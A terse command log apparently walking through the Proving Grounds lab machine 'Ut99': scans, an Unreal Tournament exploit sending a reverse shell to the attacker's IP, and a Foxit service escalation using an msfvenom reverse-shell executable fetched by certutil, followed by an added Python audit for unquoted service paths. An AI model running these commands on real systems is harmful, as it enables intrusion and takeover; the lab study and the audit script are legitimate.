Ut99


ProvingGrounds Windows

nmap -A -p- -oA ut99 192.168.198.44 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA ut99 192.168.198.44

nmap -sU -O -p- -oA ut99-udp 192.168.198.44

nikto -h 192.168.198.44:80

whatweb http://192.168.198.44

ftp 192.168.198.44

We log in as anonymous, but it does not work

http://192.168.198.44

searchsploit Unreal

searchsploit -m 16145.pl

https://www.exploit-db.com/exploits/16145

perl 16145.pl 192.168.198.44 7778 192.168.49.198 80

nc -lvnp 80

type local.txt

dir

We run dir in FTP and see Foxit

searchsploit -m 36390.txt

We run dir in Program Files (x86) and see Foxit

sc qc FoxitCloudUpdateService

We create a file hola.txt to check whether we have permissions

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.198 LPORT=80 -f exe -o Foxit.exe

python3 -m http.server 80

certutil.exe -f -urlcache -split http://192.168.49.198/Foxit.exe

shutdown.exe -r -f -t 1

nc -lvnp 80

whoami
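
A defensive check for the service misconfiguration the Foxit step depends on, added here as an example that is not part of the original write-up: it parses `sc qc` output, flags an unquoted binary path containing spaces, and lists the folders whose ACLs need review. It assumes the `sc qc FoxitCloudUpdateService` output (not reproduced on the page) showed such a path; the sample output, service name, path and function names are constructed for illustration.

```python
import re

# Constructed sample of `sc qc <service>` output; name and path are illustrative.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ExampleUpdateService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\Example Vendor\Update Service\updater.exe /svc
        DISPLAY_NAME       : Example Update Service
        SERVICE_START_NAME : LocalSystem
"""

def parse_sc_qc(text):
    """Return the 'KEY : value' fields of one `sc qc` result as a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s?(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

def audit_service(text):
    """Flag an unquoted image path with spaces; list folders whose ACLs need review."""
    f = parse_sc_qc(text)
    path = f.get("BINARY_PATH_NAME", "")
    finding = {"service": f.get("SERVICE_NAME"), "account": f.get("SERVICE_START_NAME"),
               "unquoted": False, "review_dirs": [], "quoted_fix": None}
    m = re.match(r"(?i)(.+?\.exe)(\s.*)?$", path)
    if path.startswith('"') or not m or " " not in m.group(1):
        return finding  # quoted, unparseable, or no spaces: nothing ambiguous
    exe, args = m.group(1), m.group(2) or ""
    finding["unquoted"] = True
    finding["quoted_fix"] = f'"{exe}"{args}'
    # Each space makes the path ambiguous to the service launcher, so the folder
    # containing that space-delimited prefix must not be writable by ordinary users.
    for i, ch in enumerate(exe):
        if ch == " ":
            parent = exe[:i].rsplit("\\", 1)[0] + "\\"
            if parent not in finding["review_dirs"]:
                finding["review_dirs"].append(parent)
    return finding

if __name__ == "__main__":
    for key, value in audit_service(SAMPLE_SC_QC).items():
        print(f"{key}: {value}")
```

A service flagged this way is remediated by setting the quoted path and removing write access for non-administrators on every folder in `review_dirs` and on the service's own directory.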

© 2025 Cu3rv0x